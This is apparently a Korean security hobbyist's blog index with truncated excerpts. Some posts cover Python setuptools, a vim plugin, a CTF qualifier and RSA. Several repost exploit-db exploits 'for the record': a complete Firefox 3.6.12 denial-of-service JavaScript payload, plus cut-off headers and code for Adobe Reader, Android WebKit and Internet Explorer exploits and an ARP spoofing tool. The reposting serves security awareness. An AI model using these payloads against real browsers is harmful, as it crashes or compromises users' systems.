-
여기서 설명하는 윈도우 환경이며 리눅스 환경도 유사할 것으로 보인다. 먼저 setuptools 라는 패키지가 필요하다. 아래 URL에서 다운로드 하여 설치하도록 하자. 다운로드 : http://pypi.python.org/pypi/setuptools 설치를 하면 아래 경로에 easy_install.exe 같은 파일이 생성된다. 생성되는 파일 : Python 설치경로\Scripts\easy_install.exe 해당 파일을 이용하여 아래와 같이 패키지를 설치 및 제거를 할 수 있다. 설치 : easy_install /my_downloads/OtherPackage-3.2.1-py2.3.egg 제거 : easy_install […]
-
vim 에서 자동으로 자동완성을 해주는 플러그인을 설치해 보도록 하겠습니다. 제가 설치한 환경은 Cygwin에 설치된 vim 입니다. AutoComplPop : http://www.vim.org/scripts/script.php?script_id=1879 L9 : http://www.vim.org/scripts/script.php?script_id=3252 위 플러그인을 /usr/share/vim/vim73 이하 autoload, doc, plugin 폴더에 각각 설치합니다. 마지막으로 .vimrc에 아래 코드를 추가합니다. function! InsertTabWrapper() let col = col('.') – 1 if !col || getline('.')[col-1]!~'\k' return "\<TAB>" else if pumvisible() return […]
-
최근에 Firefox 취약점이 자주 나오네요.. 불안하게 -_- 출처 : http://www.exploit-db.com/exploits/15498/ <!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <
[email protected]> Marco 'white_sheep' Rondini <
[email protected]> Alessandro 'scox' Scoscia <
[email protected]> –> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
-
Adobe 관련 취약점들이 수도없이 쏟아져 나왔으며 계속해서 나오고 있다. 정리가 필요할 거 같아 정리해둔다. 빠진건 계속해서 업데이트 하고 우선 이것들만…… 이후엔 Sandbox 형태로 바뀔거라고 하던데 과연? util.printf – CVE-2008-2992 Adobe Reader Javascript Printf Buffer Overflow Exploit =========================================================== Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow CVE-2008-2992 Thanks to coresecurity for the technical background. 6Nov,2008: Exploit released by me Credits: Debasis Mohanty […]
-
안드로이드에서 원격에서 실행가능한 취약점이 확인되었네요.. 기록용으로 남겨 둡니다. 출처 : http://www.exploit-db.com/exploits/15423/, http://www.exploit-db.com/exploits/15548/ <html> <head> <script> // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android 🙂 //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 – 2.1 //patched= android 2.2 //author = mj […]
-
익스플로러 취약점이 또 나왔네요. 악성코드 유포에 이용될 수 있기에 기록해 둡니다. 출처 : http://www.exploit-db.com/exploits/15421/ # Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com # notes : This is a quick and […]
-
2010년 11월 3일 오후 11시부터 6일 오후 11시까지 있었던 예선경기가 끝났습니다. 저는 GimmeDiamond (최근 문명의 간디가 유행이죠? :D) 이란 팀으로 나가 7위에 랭크되었습니다. 29일이 본선인데… 설레이네요.
-
악성코드 유포에 이용되고 있어 기록해 둡니다…지겨운 ARP Spoooooooooooooofing 🙁 출처 : http://www.exploit-db.com/exploits/15076/ ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | […]
-
최근 노벨상 사이트에 삽입된 악성코드와 관련된 코드 입니다. 출처 : http://www.exploit-db.com/exploits/15341/ <html><body> <script> function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } function crashme() { var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) […]
-
[알고리즘] 1). 두 개의 큰 소수 p와 q를 선정한 다음에 법n 과 φn 을 계산합니다. 법n = pq φn = (p-1) (q-1) 2). 공개키 e는 φn과 서로 소(素)의 관계가 되게 임의로 선정합니다. 3). e*d Mod φn = 1 의 관계에 있는 개인키 d를 유클리드 알고리즘을 통해 구합니다. 4). {e, n}을 공개키로 공개하고, {d} 는 개인키로 […]